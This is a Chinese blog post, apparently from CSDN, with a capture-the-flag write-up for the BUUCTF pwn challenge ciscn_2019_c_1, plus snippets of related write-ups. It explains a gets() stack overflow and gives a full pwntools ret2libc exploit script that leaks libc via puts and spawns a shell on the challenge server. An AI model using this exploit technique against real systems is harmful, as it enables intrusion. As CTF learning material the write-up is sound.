buuctf ciscn_2019_c_1 wp

最新推荐文章于 2022-02-27 18:37:47 发布
最新推荐文章于 2022-02-27 18:37:47 发布
阅读量398 收藏 1
点赞数
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xshower/article/details/116356650
版权

记录下学习pwn的过程(感觉比re难多了,我太菜了)

查看保护
在这里插入图片描述

64位程序,64位程序 的前六个参数依次保存在 RDI, RSI, RDX, RCX, R8 和 R9,多的参数再通过栈传递

在encrypt函数里使用了gets函数,可能有栈溢出

发现对输入进行了加密

可以使用“\0”绕过

构造rop链,需要使用到rdi传递参数,又因为是ubuntu18所以需要栈对齐,使用到一个ret
在这里插入图片描述

from pwn import *
from LibcSearcher import *

p=remote("node3.buuoj.cn",25805)
pop_rdi_ret=0x400c83

elf=ELF("./ciscn_2019_c_1")
main_addr=elf.sym["main"]
puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]

p.recvuntil("Input your choice!\n")
p.sendline("1")

payload="\0"+"a"*(0x50-1+8)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr)

p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(payload)

p.recvuntil("Ciphertext\n")
p.recvuntil("\n")

puts_addr=u64(p.recvuntil('\n',drop=True).ljust(8,'\x00'))

libc=LibcSearcher("puts",puts_addr)
lib_base=puts_addr-libc.dump("puts")
system_addr=lib_base+libc.dump("system")
bin_sh=lib_base+libc.dump("str_bin_sh")

print(hex(lib_base))
p.recvuntil("Input your choice!\n")
p.sendline("1")

ret_addr=0x4006b9
payload2="\0"+"a"*(0x50-1+8)+p64(ret_addr)+p64(pop_rdi_ret)+p64(bin_sh)+p64(system_addr)


p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(payload2)
p.interactive()
N1ptune__
关注
专栏目录
ciscn_2019_c_1 1
qq_41560595的博客
10-06 4412
payload构造 此题和之前总结的ret2libc题型相似,但是那个题是32位的,而此题是64位的。因此,payload的构造方式不一样。 payload1 此时的esp正处于函数返回的状态,即从上往下走。 在64位中,有rdi,rsi,rdx,rcx,r8,r9几个寄存器保存参数。当esp指向pop rdi ;ret时,rip指向puts_got,puts_got所保存的真实地址就能弹到rdi上。以上是准备参数。 再往下就是是固定格式“函数地址+返回地址+参数”的体现: 利用puts_plt作为函数地
Buu CTF PWN ciscn_2019_c_1 WriteUp
m0sway的博客
03-03 573
Buu CTF PWN题ciscn_2019_c_1的WriteUp
Pwn_buuctf_ciscn_2019_c_1
Trick的博客
11-20 457
libc64 ida查看 在main函数没有发现明显漏洞 跟进encrypt()函数 发现了gets()和puts()函数,可以利用gets的栈溢出泄漏出puts的地址,从而找到libc版本信息getshell exp: from pwn import * from LibcSearcher import * p= remote('node3.buuoj.cn',25412) #p= remote('127.0.0.1',12345) #p = process('./ciscn_2019_c_1') #
ciscn_2019_c_1
怪味巧克力的博客
07-18 610
0x01 检查文件,64位 检查开启的保护情况 开启了NX保护 0x02 IDA静态分析 在主函数这里并没有常见的gets栈溢出,尝试再这里面的子函数找找,发现了encrypt函数,进去查看 发现这个变量x的自增是由空间大小限制的,猜测这里会出现栈溢出漏洞,写出exp尝试溢出 0x03 exp: from pwn import * from LibcSearcher import * content = 0 context(os='linux', arch='amd64', log_level='
buuctfciscn_2019_c_1wp的简单收获
Probeginner的博客
11-20 757
首先不得不说BUU里头用到LibcSearcher泄露libc非常离谱,反正还是用"libc = ELF('./……')"比"libc = LibcSearcher()"较合适.接下来谈谈这题的wp:` from pwn import * from LibcSearcher import * context.log_level=‘debug’ #p=process(‘1’) p=remote(“node4.buuoj.cn”,27213) elf=ELF(’./1’) puts_plt=elf.plt[“
BUUCTF__web题解合集(十二)
风过江南乱的博客
10-14 889
1、[BSidesCF 2019]Kookie 2、[CISCN2019 华北赛区 Day1 Web5]CyberPunk 3、[RCTF2015]EasySQL 4、[Zer0pts2020]Can you guess it? 5、[HITCON 2017]SSRFme
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 391
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
BUUCTF-模板注入专项刷题
m0_51563147的博客
02-27 3442
SSTI: 目录 简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018]shrine 想方设法获取config [CISCN2019 华东南赛区]Web11 smarty模板注入 [BJDCTF2020]The mystery of ip [GYCTF2020]FlaskApp debug模式一定条件下可以窃取出来pin码命令执行,但是题目过滤的不够严格导致.
2021第十四届全国大学生信息安全竞赛WPCISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
【BUU】ciscn_2019_c_1
bzduanlei的博客
07-30 269
一、解题思路 0x01 检查文件 开启了NX保护,堆栈不可执行。 0x02 将文件拖入IDA分析 分析主函数,发现get(s)函数存在栈溢出。 0x03 未寻找到system和‘/bin/sh’,需要通过puts函数泄露远端服务器中libc的基址,从而利用远端服务器libc中的system和字符串‘/bin/sh’的地址构造payload。 借助LibcSearcher工具,查找函数在内存中的真正地址。 LibcSearcher安装: git clone https://github.com/liean
[BUUCTF-pwn]——ciscn_2019_c_1
Y_peak的博客
02-07 1242
[BUUCTF-pwn]——ciscn_2019_c_1 题目地址:https://buuoj.cn/challenges#ciscn_2019_c_1 题目: 下载下来checksec一下 再IDA上面看一下,利用shift + f12看下字符串,发现没有我们想要的字符串。以为是ret2shellcode,结果弄了半天不可以。重新看一遍发现开启了NX保护,原来是ret2libc类型的,呜呜呜。 ...
2021CISCN RE WP
qq_45739995的博客
05-17 451
逆向题质量太高了,菜鸡比赛只做出来两个题。 其他的题会在赛后继续复现出来。 持续更新中… glass jeb打开主函数发现调用了native层 ida打开 输入长度39位 第一个函数跟进发现调用了rc4 第二个函数用v7对flag加密(数组移位+异或) 第三个直接对flag加密(三位一组进行加密处理+异或) 大体思路:根据已有的字符串,首先逆掉第三个函数 得到用rc4数组加密后的 然后求出rc4的数组 最后在第二个函数里进行异或拿到flag (变量名用的有点乱) #include<stdio.h&
CISCN RE 部分wp
lucky_boyQAQ的博客
05-19 286
CISCN re 部分wp glass jeb打开,发现加密过程在so文件里面 ida看so文件 查看自己的加密函数 解密1 unsigned char flag[39]={ 0xA3, 0x1A, 0xE3, 0x69, 0x2F, 0xBB, 0x1A, 0x84, 0x65, 0xC2, 0xAD, 0xAD, 0x9E, 0x96, 0x05, 0x02, 0x1F, 0x8E, 0x36, 0x4F, 0xE1, 0xEB, 0xAF, 0xF0, 0xEA, 0xC4,
CISCN部分WP
qq_51425032的博客
05-17 1060
(1)easy_sql 打开环境,是一个登录界面,因为直接告诉了是sql注入,那么就先测试注入点是哪个 然后可以测试出注入点为psswd 用bp抓包老样子然后保存在本地 sqlmap扫库 sqlmap -r 2.txt --dbs 跑到数据名为:security 然后跑表, sqlmap -r 2.txt -D security -tables 发现有两张表user和`flag,没办法继续按常用的方法进行解题,因此表名无法直接爆出来,但是可以进行猜测表明然后根据无列名...
BUUCTF-Pwn-ciscn_2019_c_1
餐桌上的猫
02-14 3642
题目截图 检查一下文件信息 开启了NX,64位的文件 使用IDA打开 按shift+F12查看字符串,没有找到“flag”和“/bin/sh”类似的字符串 一番寻找也没有找到system函数 查看函数导入表找到了puts函数和gets函数,说明使用了libc动态库,可以从这里入手 找到gets函数所在位置查看 在函数encrypt中使用了gets函数,存在栈溢出,点击encrypt函数的名称,按x检查交叉引用 双击进入查看调用函数 运行程序可以了解到,该程序的功能是对字符串进行加密和解密,这段代码
EEPROM_WP_Pin
最新发布
07-27
EEPROM_WP_Pin是一个常见的术语,它通常用于描述电子设备中的一个引脚或接口。EEPROM代表可擦写可编程只读存储器(Electrically Erasable Programmable Read-Only Memory),WP代表写保护(Write Protect)。因此,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值